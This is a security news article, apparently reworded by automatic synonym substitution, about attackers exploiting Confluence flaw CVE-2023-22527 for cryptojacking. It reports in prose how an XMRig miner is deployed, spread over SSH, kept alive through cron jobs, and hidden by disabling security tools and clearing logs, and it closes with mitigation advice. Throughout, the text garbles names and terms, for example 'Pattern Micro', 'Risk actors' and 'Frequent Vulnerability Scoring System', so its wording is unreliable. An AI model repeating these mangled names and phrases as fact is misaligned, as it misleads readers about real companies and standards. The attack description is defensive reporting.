Risk actors proceed to use a vital distant code execution (RCE) Atlassian bug found in January, with new assault vectors that flip focused cloud environments into cryptomining networks.
Pattern Micro has uncovered two separate assaults that use the flaw — tracked as CVE-2023-22527 within the Confluence Knowledge Middle and Confluence Server — in cryptojacking assaults that drain community sources. The server is for enterprise-level deployments of Atlassian Confluence, a collaboration and documentation platform designed for groups and organizations to create, share, and collaborate on content material.
When found, the bug obtained a ten out of 10 on the Frequent Vulnerability Scoring System (CVSS), so researchers knew out of the gate that it had nice potential for exploit in assaults starting from ransomware to cyber espionage. Now, cryptojacking may be added to that record, eight months after the flaw’s discovery and subsequent patching by Atlassian, in keeping with a weblog submit printed on Aug. 28 by Pattern Micro.
“The assaults contain menace actors that make use of strategies such because the deployment of shell scripts and XMRig miners, concentrating on of SSH endpoints, killing competing cryptomining processes, and sustaining persistence through cron jobs,” Abdelrahman Esmail, senior engineer of menace analysis for Pattern Micro, wrote within the submit.
Pattern Micro additionally found 1000’s of different makes an attempt to use max-critical CVE-2023-22527 over the previous few months, and thus really useful that these utilizing the server who have not but patched their environments ought to accomplish that as rapidly as attainable.
New Assault Vectors for CVE-2023-22527
By abusing CVE-2023-22527, an unauthenticated attacker can obtain template injection, basically enabling RCE on the affected occasion.
Pattern Micro found three menace actors utilizing the bug for cryptojacking assaults. Nonetheless, solely two totally different assault vectors are described within the submit. The primary one exploited the flaw within the public-facing a Confluence Server utility for preliminary entry to the setting. Attackers then executed the XMRig miner through an ELF file payload, hijacking system sources within the course of.
The second assault vector is far more difficult. It used a shell script to execute miner exercise by means of a shell file over Safe Shell (SSH) for all accessible endpoints within the buyer setting, in keeping with Pattern Micro. The attackers downloaded the shell file and ran it with bash from reminiscence, then killed all recognized cryptomining processes and any course of being run from */tmp/* directories. Then, they deleted all cron jobs, including a brand new one which runs each 5 minutes to test for command-and-control (C2) server communications.
To keep away from detection, the attackers additionally uninstalled safety companies reminiscent of Alibaba Cloud Protect, whereas blocking the Alibaba Cloud Protect IP deal with. Earlier than the cryptojacking started later within the assault course of, the attacker additionally turned off different safety instruments current on the system.
In the meantime, the adversaries recognized the present machine’s IP deal with and gathered information on all attainable customers, IP addresses, and keys, utilizing the knowledge to focus on different distant methods through SSH to execute additional cryptomining actions, Esmail defined within the submit. As soon as that is finished, the attacker launched automated assaults on the focused different hosts through SSH, after which maintained entry to the server by means of different cron jobs.
“After guaranteeing that every one cloud monitoring and safety companies are terminated or deleted, the attacker terminates the entry level course of that exploits CVE-2023-22527 and downloads the XMRig miner to start mining actions,” Esmail wrote. As soon as cryptomining begins, the attackers attacker then eliminated all traces of their exercise by clearing log and bash historical past.
Additional Mitigations Towards Atlassian Confluence Assaults
Staying on prime of bug patching for software program, working methods, and functions is the best solution to stop such vulnerabilities from being exploited, however Pattern Micro additionally made different options for directors of cloud environments. These embrace practising community segmentation, which might scale back the influence of exploit-based assaults, and that organizations ought to conduct common safety audits and vulnerability assessments to assist uncover and deal with weaknesses in infrastructure earlier than exploit happens. Past that, organizations ought to have a strong incident response plan in place to make sure a swift and efficient response in case of compromise.